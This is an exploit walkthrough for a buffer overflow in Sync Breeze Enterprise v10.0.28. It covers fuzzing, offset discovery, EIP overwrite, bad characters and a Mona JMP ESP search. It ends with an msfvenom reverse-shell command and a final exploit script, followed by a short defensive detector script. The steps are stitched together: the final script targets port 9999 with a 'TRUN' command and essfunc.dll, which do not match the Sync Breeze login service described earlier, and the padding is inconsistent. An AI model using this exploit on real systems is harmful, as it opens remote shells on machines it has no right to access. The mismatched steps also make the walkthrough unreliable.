Sync Breeze Enterprise

Sync Breeze Enterprise v10.0.28

1. Initial Reconnaissance

  • Port Scanning:

    sudo nmap <IP>

    Identify open ports. In this case, port 80 is open.

  • Discover Service and Version: Open Firefox, visit the HTTP page, and find the service version:

    Sync Breeze Enterprise v10.0.28

  • Discover Communication Method: Use Wireshark to capture the communication between your machine and the server in a local lab. This shows the request format the fuzzer has to reproduce (here a POST to /login with username and password parameters).

2. Fuzzing

  • Simulation: Python script that reproduces the captured login request and fuzzes the username field with a growing number of bytes until the service crashes.

    # Fuzzing Script
    import socket, time

    c = 100  # length of the username field; grows by 100 bytes each round
    while True:
        payload = "username=" + 'A' * c + "&password=1234"
        # blank line separates the headers from the form body
        request = "POST /login HTTP/1.1\r\n" + "...other headers...\r\n\r\n" + payload
        s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
        s.connect(("192.168.1.4", 80))
        s.send(request.encode())
        s.close()
        c += 100  # the value of c at the round that crashes the service bounds the offset
        time.sleep(5)

3. Finding the Offset

  • Generate a unique cyclic pattern using Metasploit's pattern_create.rb:

    /usr/share/metasploit-framework/tools/exploit/pattern_create.rb -l 3000

  • Send this pattern in place of the 'A's, read the four bytes that land in EIP from the debugger, and look them up with pattern_offset.rb to get the offset:

    pattern = ""  # Paste the pattern generated by pattern_create.rb here

4. Overwriting the EIP

  • Send a payload that overwrites EIP with a known value to confirm control of the instruction pointer:

    # Example payload with EIP set to 42424242 ("BBBB"); the rest is filler up to 3000 bytes
    shellcode = b"A" * 2003 + b"B" * 4 + b"\x42\x42\x42\x42" + b"C" * (3000 - 2003 - 4)

5. Finding Bad Characters

  • Send every byte value after the EIP overwrite and compare the bytes that reach the stack in the debugger with what was sent; any byte that is dropped or altered is a bad character:

    # Example payload for finding bad characters
    badchars = b"\x01\x02\x03\x04\x05..."  # List of all possible byte values

6. Finding the Right Module

  • Use Mona to list the loaded modules (looking for one without protections such as ASLR or SafeSEH) and search it for a JMP ESP instruction (opcode \xff\xe4):

    !mona modules
    !mona find -s "\xff\xe4" -m essfunc.dll

7. Generating Shellcode

  • Use MSFVenom to generate shellcode:

    msfvenom -p windows/shell_reverse_tcp LHOST=192.168.1.5 LPORT=4444 -f c

8. Gaining Root

  • Update the Python script with the generated shellcode, start a Netcat listener on the LPORT chosen above, and run the script.

# Final script
import sys, socket
from time import sleep

overflow = b"\xb8\x5c\x1e\x35\x96\xd9..."  # Shellcode generated by msfvenom
# padding up to the offset, the EIP overwrite, a 16-byte NOP sled, then the shellcode
shellcode = b"A" * 2003 + b"B" * 4 + b"\x42\x42\x42\x42" + b"\x90" * 16 + overflow

try:
    s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
    s.connect(('192.168.4.104', 9999))
    payload = b"TRUN /.:/" + shellcode
    s.send(payload)
    s.close()
except OSError:
    print("Error connecting to the server")
    sys.exit()
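As an added example (not part of this walkthrough), a small detector for the kind of login traffic the fuzzer in step 2 sends: it parses a raw HTTP POST to /login and flags an oversized form field, a long run of one repeated byte, NOP-sled bytes and non-printable data. The thresholds, the request builder and the three sample requests are constructed here and are assumptions, not values from the original.

```python
import re
from urllib.parse import parse_qs

MAX_FIELD_LEN = 256   # assumed sane upper bound for a login form field
MIN_REPEAT_RUN = 64   # one byte repeated this often looks like the 'A' * c fuzzer

def parse_request(raw: bytes):
    """Split a raw HTTP request into (method, path, body); the body stays bytes."""
    head, _, body = raw.partition(b"\r\n\r\n")
    request_line = head.split(b"\r\n", 1)[0]
    method, path, _version = request_line.split(b" ", 2)
    return method.decode(), path.decode(), body

def inspect_request(raw: bytes) -> list:
    """Return findings for one request; an empty list means nothing suspicious."""
    method, path, body = parse_request(raw)
    findings = []
    if method != "POST" or path != "/login":
        return findings
    # latin-1 maps every byte to one code point, so raw payload bytes survive parsing
    form = parse_qs(body.decode("latin-1"), keep_blank_values=True)
    for field, values in form.items():
        for value in values:
            if len(value) > MAX_FIELD_LEN:
                findings.append(f"{field}: length {len(value)} exceeds {MAX_FIELD_LEN}")
            if re.search(r"(.)\1{%d,}" % (MIN_REPEAT_RUN - 1), value, re.S):
                findings.append(f"{field}: long run of one repeated byte")
            if "\x90" * 8 in value:
                findings.append(f"{field}: NOP sled bytes (0x90) present")
            if any(ord(ch) > 0x7E or (ord(ch) < 0x20 and ch not in "\t\r\n") for ch in value):
                findings.append(f"{field}: non-printable bytes in form field")
    return findings

def build_login(body: bytes) -> bytes:
    """Constructed sample request in the shape the fuzzer above sends (hypothetical headers)."""
    return (b"POST /login HTTP/1.1\r\nHost: 192.168.1.4\r\n"
            b"Content-Type: application/x-www-form-urlencoded\r\n"
            b"Content-Length: " + str(len(body)).encode() + b"\r\n\r\n" + body)

# constructed samples: a normal login, one fuzzing round, and an overflow-shaped body
BENIGN = build_login(b"username=alice&password=s3cret")
FUZZ = build_login(b"username=" + b"A" * 2000 + b"&password=1234")
SLED = build_login(b"username=" + b"A" * 2003 + b"BBBB" + b"\x90" * 16 + b"&password=1234")

if __name__ == "__main__":
    for name, req in (("benign", BENIGN), ("fuzz", FUZZ), ("sled", SLED)):
        print(name, inspect_request(req) or "clean")
```

The same checks can be run over request bodies exported from the Wireshark capture in step 1 or from a reverse proxy log that records POST bodies.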
